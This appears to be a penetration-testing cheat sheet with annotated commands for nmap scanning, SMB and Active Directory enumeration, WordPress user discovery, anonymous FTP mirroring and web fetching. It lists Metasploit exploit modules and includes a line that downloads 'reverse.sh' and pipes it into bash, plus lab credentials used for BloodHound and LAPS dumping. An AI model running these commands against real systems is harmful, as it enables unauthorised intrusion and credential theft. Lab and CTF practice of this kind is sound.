https://pentestsector.com/docs/1.0/services/1443-mssql#credentials
Quick nmap win
Retrieves ports from nmap result file
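# Collect the port numbers from an nmap result file into one comma-separated
# line (e.g. "21,22,80"), ready for nmap -p.
# Reads: nmap_discovery (only lines that start with a number contribute).
# grep -o keeps the leading digits of each line; paste joins them with ','
# and, unlike tr, leaves no trailing comma to strip (the original cat | tr |
# sed chain was a useless-use-of-cat plus a fix-up for tr's trailing ',').
grep -o '^[0-9]*' nmap_discovery | paste -sd ',' -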
Who is there?
# Ping sweep of the /24; keep only the host field (5th word) of the
# "Nmap scan report for ..." lines.
nmap -sn 10.11.1.0/24 | grep for | cut -d ' ' -f 5
# Windows netcat: verbose zero-I/O (-z) probe of TCP 1-1024 on one host,
# no DNS (-n), 1 s timeout per connection.
nc.exe -n -v -z -w1 10.185.11.127 1-1024
Which OS out there?
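# OS-detect every host in target.txt and keep only the "Running" / "OS" summary
# lines; head -n -1 (GNU) drops the final line (presumably nmap's trailing
# "OS detection performed" notice — confirm on real output).
# grep -E replaces egrep, which GNU grep flags as obsolescent; the alternation
# is grouped so the ^ anchor applies to both words.
nmap -O -iL target.txt | grep -Ei '^(running|os)' | head -n -1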
Find FTP / web target
# SYN-probe 80 and 21 across the /24 (raw sockets, hence sudo) and print the
# host field of each "Nmap scan report for ..." line; port state is not
# filtered here, so check it separately.
sudo nmap -sS -p 80,21 10.11.1.0/24 | grep for | cut -d ' ' -f 5
Low hanging fruit
# Broad TCP scan of 10.10.10.198: SYN + version + OS detection, T4 timing,
# ports in order (-r), the default/auth/vuln/exploit/discovery script
# categories minus the listed exclusions, unsafe script args enabled, and all
# output formats written as 10.10.10.198-NMAP-TCP.*
nmap -sS -sV -O -T4 -r -oA 10.10.10.198-NMAP-TCP \
  --script '(default or auth or vuln or exploit or discovery) and not (dns-cache-snoop or broadcast or http-vuln-cve2013-7091 or dns-brute or http-vuln-cve2011-3192 or http-cross-domain-policy or http-slowloris* or http-google-malware or targets-* or *icloud*)' \
  --script-args unsafe=1 \
  10.10.10.198
# Every script whose name contains "vuln", against the hosts in target.txt.
nmap -T4 -v -iL target.txt --script '*vuln*' -oN nmap_vulns.txt
# The "vuln" script category across a /24.
nmap -v -oN nmap_vulns.txt --script vuln 10.11.1.0/24
# RDP encryption-level enumeration on 3389.
nmap -v -p 3389 --script rdp-enum-encryption -iL target.txt -oN nmap_rdp_enum.txt
# MS08-067 and MS17-010 SMB checks on a single host.
nmap -v -p 139,445 --script smb-vuln-ms08-067,smb-vuln-ms17-010 -oN nmap_rdp.txt 10.11.1.5
# CVE-2017-7494 (Samba) version check only; -Pn skips host discovery.
nmap -Pn -p 445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version 10.11.1.146
# Connect scan with version detection and the MS08-067 script; no ping, no DNS.
nmap -sT -sV -Pn -n -v -p 22,80,135,139,445 --script smb-vuln-ms08-067.nse -iL target.txt
# Supported SMB dialects.
nmap -Pn -n -v -p 135,139,445 --script smb-protocols -iL target.txt
# SMB session enumeration over TCP 445.
nmap -Pn -n -v -p 445 --script smb-enum-sessions.nse -iL target.txt
# Same script over UDP 137 + TCP 139 (UDP and SYN scans need root).
sudo nmap -sU -sS -Pn -n -p U:137,T:139 --script smb-enum-sessions.nse -iL target.txt
# SMB OS discovery with the script given by path; unsafe script args enabled.
nmap -v -p 139,445 --script-args unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1
# Anonymous-FTP check (port 21 only) for every host in target.txt; normal
# output saved to ftp_anon_10.11.1.0.txt.
nmap -p 21 --script ftp-anon -iL target.txt -oN ftp_anon_10.11.1.0.txt
# Probe 80/8080/443 on a /24 with the CVE-2010-2861 directory-traversal script
# (it can also retrieve the admin password hash). "[ip target]" is a
# placeholder for the network address.
nmap -p 80,8080,443 --script http-vuln-cve2010-2861 [ip target]/24
# Common web/FTP ports across the listed targets; --open shows open ports only.
nmap --open -p 80,8000,8080,8081,8082,443,21 -iL target_10.1.1.0.txt
# FTP only, every host in target.txt.
nmap -p 21 -iL target.txt
# Web ports over the /24, open only.
nmap --open -p 80,8080,443 10.11.1.0/24
# SMTP/DNS/POP3 over the /24, open only.
nmap --open -p 25,53,110 10.11.1.0/24
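# MSSQL (1433) info, NTLM info and empty-password checks against $ip;
# no DNS, no ping, version detection on.
# Fixed: the original spelled the option with a typographic en-dash
# ("–script"), which nmap does not parse as an option; it must be the ASCII
# "--script". $ip is quoted so an unset or odd value cannot word-split.
nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password "$ip"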
# rustscan port sweep of 192.168.2.2 (10 s timeout, raised ulimit); everything
# after "--" is handed to nmap for the follow-up scan.
sudo rustscan -a 192.168.2.2 -t 10000 --ulimit 10000 -- -Pn -sC -sV 192.168.2.2
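# UDP scan of the 20 most common UDP ports on $RHOST, very verbose, output to
# nmap-udp.out (-o kept as written). UDP scans need raw sockets, so run this
# as root or via sudo as the next line does.
# Fixed: "$RHOST" is quoted so an unset or odd value cannot word-split.
nmap -sU --top-ports 20 -o nmap-udp.out -vvv "$RHOST"
# Top 100 UDP ports on a single host.
sudo nmap -sU --top-ports 100 10.11.1.111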
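# For every host in target_10.1.1.0.txt and every port in common_ports.txt,
# fetch http://host:port (silent, insecure TLS, follow redirects) and print the
# body between banner lines.
# Fixes vs. the original one-liner: the files are read line by line instead of
# word-splitting $(cat …); printf replaces echo "\n" (bash's echo prints the
# backslash sequence literally); and curl is run directly — the original
# wrapped it in "`…`", which made the shell try to execute the fetched page
# body as a command name. </dev/null keeps curl from reading the loop's input.
while IFS= read -r host; do
  while IFS= read -r port; do
    printf 'curl -skL http://%s:%s\n\n' "$host" "$port"
    curl -skL "http://$host:$port" </dev/null
    printf '\n\n=====================================\n'
  done < common_ports.txt
done < target_10.1.1.0.txt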
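# Run nikto against every host in target.txt; all output goes to nikto.txt.
# Fixes vs. the original: read -r replaces the word-splitting $(cat …) loop;
# printf replaces echo "\n" (bash's echo prints it literally); </dev/null stops
# nikto from consuming the rest of the host list through stdin.
while IFS= read -r host; do
  nikto --ask=no -h "$host" </dev/null
  printf '\n\n=====================================\n'
done < target.txt > nikto.txt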
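# Fetch each host listed in ips (curl default scheme, follow redirects) and
# collect the bodies, with a ">>> host" header each, into
# ips_10.10.1.x_port80.txt.
# Fixes vs. the original: line-by-line read instead of $(cat …); printf instead
# of echo "\n" (literal in bash); "$host" quoted; </dev/null so curl cannot
# read the host list.
while IFS= read -r host; do
  printf '>>> %s \n\n' "$host"
  curl -s -L "$host" </dev/null
  printf '\n\n=====================================\n'
done < ips > ips_10.10.1.x_port80.txt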
## AD-set
# Simple-bind LDAP search (no bind DN given, so anonymous) of the
# dc=hutch,dc=offsec base on the given host.
ldapsearch -x -b 'dc=hutch,dc=offsec' -h 192.168.162.122
# BloodHound collection with every collector (-c all) for hutch.offsec,
# resolving through the name server given with -ns.
/opt/Windows/BloodHound_Python/bloodhound.py -ns 192.168.219.122 -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -c all
# LAPS module over LDAP with the same account; KDC given explicitly.
crackmapexec ldap 192.168.219.122 --kdcHost 192.168.219.122 -u fmcsorley -p CrabSharkJellyfish192 -M laps
Common vulns
exploit/windows/smb/psexec
exploit/multi/http/tomcat_mgr_upload
exploit/windows/smb/ms08_067_netapi
exploit/windows/smb/ms17_010_eternalblue (EternalBlue)
exploit/windows/rdp/cve_2019_0708_bluekeep_rce (BlueKeep)
exploit/windows/smb/smb_doublepulsar_rce (DoublePulsar)
exploit/multi/http/apache_mod_cgi_bash_env_exec (Shellshock)
crackmapexec quick scan
Zerologon
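# Zerologon check module with a null session (<ip> is a placeholder).
# Fixed: the module name was truncated to "zerologo" in the original; the
# module is "zerologon", as the heading above says.
crackmapexec smb <ip> -u '' -p '' -M zerologon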
PetitPotam
# PetitPotam check module with a null session (<ip> is a placeholder).
crackmapexec smb <ip> -M petitpotam -u '' -p ''
noPAC
# noPac check module; needs a domain account (user/pass and <ip> are
# placeholders).
crackmapexec smb <ip> -M nopac -u 'user' -p 'pass'
CMS
Enumerate WordPress users
# Print (not run — note the echo) one curl command per author id 1-5, 50 at a
# time via xargs; {} is substituted with the id.
printf '%s\n' {1..5} | xargs -P 50 -I{} echo curl -s -L -i 'http://wpsite/?author={}'
# Request ?author=N for N in 1..5 and keep either the "View all posts by <user>"
# title or the Location header; '/' becomes a space, the 6th field is the
# user name, empty lines are dropped.
for ((n = 1; n <= 5; n++)); do
  curl -s -L -i "http://wpsite/?author=$n" \
    | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" \
    | tr '/' ' ' \
    | cut -f 6 -d ' ' \
    | grep -v "^$"
done
Discover with autorecon
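# Run autorecon as root against $ip, results under ./enumeration. The binary
# is resolved to a full path first (presumably because sudo's PATH does not
# include the user's install location).
# Fixed: command -v replaces which (portable, builtin); "$ip" and the
# substitution are quoted.
sudo "$(command -v autorecon)" -o enumeration "$ip"
# Same against one host, passing a WPScan API token ("xxxx" is a placeholder)
# and --only-scans-dir (per its name, keeps only the scans directory — verify).
sudo autorecon 192.168.150.56 --wpscan.api-token xxxx --only-scans-dir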
Discovery tools
# nikto against the web service on 10.11.1.116:80; stdout and stderr are both
# shown and appended to nikto.txt.
nikto -ask=no -h http://10.11.1.116:80 2>&1 | tee -a nikto.txt
# Verbose whatweb fingerprint of one host at aggression level 3.
whatweb -v --color=auto --aggression 3 10.11.1.133
Scan
Check http service
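# Fetch each host listed in ips.txt (curl default scheme, follow redirects) and
# collect the bodies, with a ">>> host" header each, into web_result.txt.
# Fixes vs. the original: line-by-line read instead of $(cat …); printf instead
# of echo "\n" (literal in bash); "$host" quoted; </dev/null so curl cannot
# read the host list.
while IFS= read -r host; do
  printf '>>> %s \n\n' "$host"
  curl -s -L "$host" </dev/null
  printf '\n\n=====================================\n'
done < ips.txt > web_result.txt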
List anonymous FTP (use --no-passive if necessary)
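# Try two anonymous-style FTP logins against every host in ips_ftp and list
# the root directory.
# The original URL's "<password>@<network>" part was mangled into
# "[email protected]" by e-mail obfuscation. Below, <subnet> is a placeholder
# for the network prefix and ips_ftp is assumed to hold the remaining octet
# per line — confirm both. The first login follows the anonymous:anonymous
# pair used elsewhere in this file; the second uses ftp:ftp, reconstructed
# because the original password was lost in the mangling.
# Fixed: line-by-line read instead of $(cat …); "$ip" quoted.
while IFS= read -r ip; do
  curl "ftp://anonymous:anonymous@<subnet>.$ip" </dev/null
  curl "ftp://ftp:ftp@<subnet>.$ip" </dev/null
done < ips_ftp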
Recursively download the FTP files and store them in folders (using the IP as the folder name)
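# Mirror (-m) the anonymous FTP tree of every host in ips_ftp; wget names the
# local directory after the host.
# The original URL's "<password>@<network>" part was mangled into
# "[email protected]" by e-mail obfuscation: <subnet> is a placeholder for the
# network prefix and ips_ftp is assumed to hold the remaining octet per line —
# confirm both. The login follows the anonymous:anonymous pair used elsewhere
# in this file.
# Fixed: line-by-line read instead of $(cat …); "$ip" quoted.
while IFS= read -r ip; do
  wget -m "ftp://anonymous:anonymous@<subnet>.$ip" </dev/null
done < ips_ftp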
Download file from ftp
# Mirror an anonymous FTP share (<ip> is a placeholder; quoted so the shell
# does not read "<" and ">" as redirections).
wget -m 'ftp://anonymous:anonymous@<ip>'
# Fallback for servers where passive mode does not work.
wget -m --no-passive 'ftp://anonymous:anonymous@<ip>'
Download website (quick crawler)
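# Recursive crawl, at most 3 levels deep.
wget -r -l 3 http://192.168.0.12
# One level deep: add .html extensions (-E), ignore Content-Length, keep the
# remote directory layout (-x), rewrite links for offline viewing (-k), fetch
# page requisites (-p), ignore robots.txt, never ascend above the start
# directory (-np), only files newer than local copies (-N).
# Fixed: the original had typographic en-dashes in "–level" and
# "–ignore-length", which wget would not accept as options.
wget -r --level=1 -E --ignore-length -x -k -p -erobots=off -np -N http://www.remote.com/remote/presentation/dir
# Downloads a script and pipes it straight into bash: whatever the server
# returns is executed unreviewed as the current user.
wget -qO- http://10.10.0.3/reverse.sh | bash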
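# List the sub-directories shown on the server's /uploads/ index page and print
# a "link: <name>" line for each.
# The names are taken from the "[DIR]" rows, field 8 when split on '"' — this
# depends on the server's autoindex markup, so check the cut field against a
# real listing. Fixed: the original put the bare string "link: ${line}" on a
# line by itself, which makes the shell try to run it as a command; it has to
# be printed.
curl http://10.10.10.10/uploads/ | grep '\[DIR\]' | cut -d '"' -f 8 > folder-names
while IFS= read -r line; do
  printf 'link: %s\n' "$line"
done < folder-names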
Retrieve all the links
# Lines containing "title" or "href", leading whitespace stripped.
curl -sL www.nmap.com/ | grep 'title\|href' | sed -e 's/^[[:space:]]*//'
# HTML comments only, leading whitespace stripped.
curl --silent http://192.168.120.34/ | grep '<!--' | sed -e 's/^[[:space:]]*//'
# Link text of every nofollow anchor: keep the 'nofollow">…</a>' fragment,
# then trim the prefix and the closing tag.
curl -sL https://relatedwords.io/dragon-ball-z | grep -oi 'nofollow">.*</a>' | perl -pe 's/^nofollow">//; s/<\/a>//'
CURL POST
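# POST with an empty body and an explicit zero Content-Length.
curl -X POST -H 'Content-Length: 0' http://10.10.11.120/api
# Multipart file upload; -k skips TLS verification, -v shows the exchange.
curl -k -v -X POST -F 'file=@/home/exploit.jpg' http://images.late.htb/scanner
# JSON body. Fixed: the original was missing the opening quote on "password",
# so the server received invalid JSON.
curl -X POST -H 'Content-Type: application/json' -d '{"name":"clobee","password":"clobee"}' http://10.10.11.120/api/user/register
# Form field plus a session cookie.
curl -X POST -F 'some=thing' -b 'session=abcdef' http://url/api/submit
# Array-style form fields; the URL is single-quoted instead of
# backslash-escaping '?' and '='.
curl -X POST -d 'username[1]=&password[2]=' 'http://192.168.74.101/admin/index.php?login=1'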
Prevent path normalisation (in Chrome)
# Send the path exactly as written (no dot-segment squashing) and do not
# trust the response's Content-Length.
curl --ignore-content-length --path-as-is http://url
Render page
# Fetch (silent, follow redirects), render the HTML as 99-column text and
# collapse adjacent duplicate lines.
curl -sL 10.11.1.71 | html2text -width 99 | uniq
# robots.txt rendered as plain text.
curl -s 10.11.1.71/robots.txt | html2text
Render page without blank lines
# Raw page with blank and whitespace-only lines removed (\S = any
# non-whitespace character, GNU grep).
curl -s 192.168.136.78 | grep '\S'
Diff content side by side
# Side-by-side (-y) diff, recursing into directories (-r).
diff -ry file.1 file.2
Grab banner
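# Web server fingerprinting.
whatweb http://scanme.nmap.org/
whatweb -v --color=auto --aggression 3 10.10.10.209
# httprint with its bundled signature file; -P0 disables the ICMP ping.
httprint -P0 -h 10.10.32.245 -s /usr/share/httprint/signatures.txt
# openssl client connect to port 80, as written.
openssl s_client -connect 10.10.32.245:80
# Headers plus body (-i), then headers only (--head).
# Fixed: "$IP" is quoted so an unset or odd value cannot word-split.
curl -i "$IP"
curl --head "$IP"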
# Manual banner grab: connect with netcat, then type the request line(s)
# shown below it and press Enter twice to end the request.
sudo nc 10.10.32.245 80
GET /index.html
# Same, as an explicit HTTP/1.1 request (HTTP/1.1 requires a Host header).
sudo nc 10.10.32.245 80
GET / HTTP/1.1
Host: 10.10.32.245
Parsing json with Jq
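# Parsing BloodHound data
# jq reads the file directly; the cat pipes in the original were redundant.
# Pretty-print the whole file.
jq . users.json
# Only the Properties object of each entry under .data.
jq '.data[].Properties' users.json
# One "samaccountname:description" line per entry (-r prints raw strings
# without JSON quotes).
jq -r '.data[].Properties | .samaccountname + ":" + .description' users.json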